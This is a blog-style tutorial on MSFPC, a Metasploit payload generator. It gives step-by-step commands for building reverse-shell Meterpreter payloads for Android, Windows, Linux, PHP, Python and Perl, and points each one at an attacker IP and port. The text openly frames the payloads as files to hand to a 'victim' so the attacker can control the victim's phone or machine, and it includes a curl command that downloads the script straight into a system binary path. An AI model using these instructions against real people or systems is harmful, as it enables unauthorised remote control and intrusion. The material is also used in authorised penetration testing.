MSFPC – Create Payload For Android, Windows and More

Hey Folks, in this tutorial we will talk about the MSFPC tool which is already installed in Kali Linux. If you know about the Msf-venom then you can easily understanding because it is alternative. In msf-venom you have to create the payload yourself and with the msfpc tool you can create multiple payloads by single click which is different for these tools.

MSFPC ( MSFvenom Payload Creator )

MSFvenom Payload Creator (MSFPC) is a automatic tool that generates multiple types of payloads, based on user-selected options. The idea is to be as simple as possible (using as few as one option) to produce a payload. Fully automating msfvenom & Metasploit is the end goal.
Author : g0tmi1k

Lets do it 🙂 !!

Features

Now first we will introduce you the features of this tool.

<TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

TYPE : Apk, Window, Asp, Java, Powershell etc.
DOMAIN/IP : Interface or IP Address.
CMD : is a standard/native command prompt/terminal to interactive with.
MSF : is a custom cross platform shell, gaining the full power of Metasploit.
BIND : opens a port on the target side, and the attacker connects to them.
REVERSE : makes the target connect back to the attacker. The attacker needs an open port.
STAGED : splits the payload into parts, making it smaller but dependent on Metasploit.
STAGELESS : is the complete standalone payload. More ‘stable’.
TCP : is the standard method to connecting back. This is the most compatible with TYPES as its RAW.
HTTP : makes the communication appear to be HTTP traffic (unencrypted)
HTTPS : makes the communication appear to be (encrypted) HTTP traffic using as SSL.
FIND_PORT : will attempt every port on the target machine, to find a way out.
LOOP : will just create one of each.
VERBOSE : will display all information.

Download ( If not )

If you want to download this tool for Ubuntu operating system or other OS then you can download it by using the following command.

curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
chmod 0755 /usr/local/bin/msfpc

Android

First create the payload for android platform by using the following command. When we enter the following command it will ask us to choose the interface in that case we can select as our need. It has select the port 443 by default but we can change.
Usage 🙂 msfpc < TYPE >

msfpc APK

You can see that the payload is made by less effort. After create the payload we need to execute the “msfconsole” command which is highlighted on above.

As well as we need to share our file to the victim that we can share according to your. But it also provide a python file share just below of msfvenom command that we can run in separate terminal.

Done ! when victim will download our payload and run it, then we can control his android phone by multi handler.

Windows

For the window platform also we will repeat the process as given above. But now we will give our localhost address and port number in advance.
Usage 🙂 msfpc < TYPE > < IP > < PORT >

msfpc EXE 192.168.0.103 4444

Once the payload created it gives the python file share and multi handler command that we have to execute together in separate terminal.

Aright ! The meterpreter will come here as soon as the victim drives our payload.

Bash

Now we will create the payload for linux platform by using the following command. But in this execution we will choose the Ethernet (eht0) interface which is our localhost address.
Usage 🙂 msfpc < TYPE > < IP/ETH0 > < PORT >

msfpc bash etho 4445

As we know that we have to give some permission to Linux shell script before execution.

chmod 777 bash-shell-staged-reverse-tcp-4445.sh
./bash-shell-staged-reverse-tcp-4445.sh

After doing all this the meterpreter will come here when the victim runs the payload.

Linux

Now we will create the payload again for linux platform but the difference between the previous payload and this one is that the extension of the first payload was “.sh” and the elf of this one.
Usage 🙂 msfpc < TYPE > < IP/ETH0 > < PORT >

msfpc Linux 192.168.0.103 4445

Victim need to give chmod permissions to this linux program.

chmod 777 linux-shell-staged-reverse-tcp-4445.elf
./linux-shell-staged-reverse-tcp-4445.elf

Nice ! As soon victim run the payload the meterpreter comes to the attacker.

PHP

Let’s try to create the payload in php by using the following command. As we know php setup is required on web server, windows or linux to execute php script.
Usage 🙂 msfpc < TYPE > < IP/ETH0 > < PORT >

msfpc PHP eth0 4444

Some permissions have to be granted after downloads the payload.

chmod 777 php-meterpreter-staged-reverse-tcp-4444.php
php php-meterpreter-staged-reverse-tcp-4444.php

Done ! The meterpreter will come here after run the payload.

Python

As we know python is an interpreted, high-level, general-purpose programming language and almost all OS systems come configured. Hence we will create our payload for python platform by using the following command.
Usage 🙂 msfpc < TYPE > < IP/ETH0 > < PORT >

msfpc Python 192.168.0.103 4444

When the target runs a “.py” extension files in its OS, meterpreter will immediately move here.

Perl

Perl is a family of two high-level, general-purpose, interpreted, dynamic programming languages which also comes the linux operating system. Lets try to make payload for perl platform by using the given command.
Usage 🙂 msfpc < TYPE > < IP/ETH0 > < PORT >

msfpc perl eth0 4444

The meterpreter will comes here as soon as victim run the payload with perl command.

Loop ( Create One for Each )

Loop which allows code to be executed repeatedly, exactly just like that we can create one payload for each platform by using the given command.

msfpc verbose loop eth0.

Stageless Payload

Stagales are a full standalone payload that is more stable than a staged payload and helps maintain a meterpreter. We can simply create the s tageless payload by using the following command.

msfpc stageless APK 192.168.0.103 4444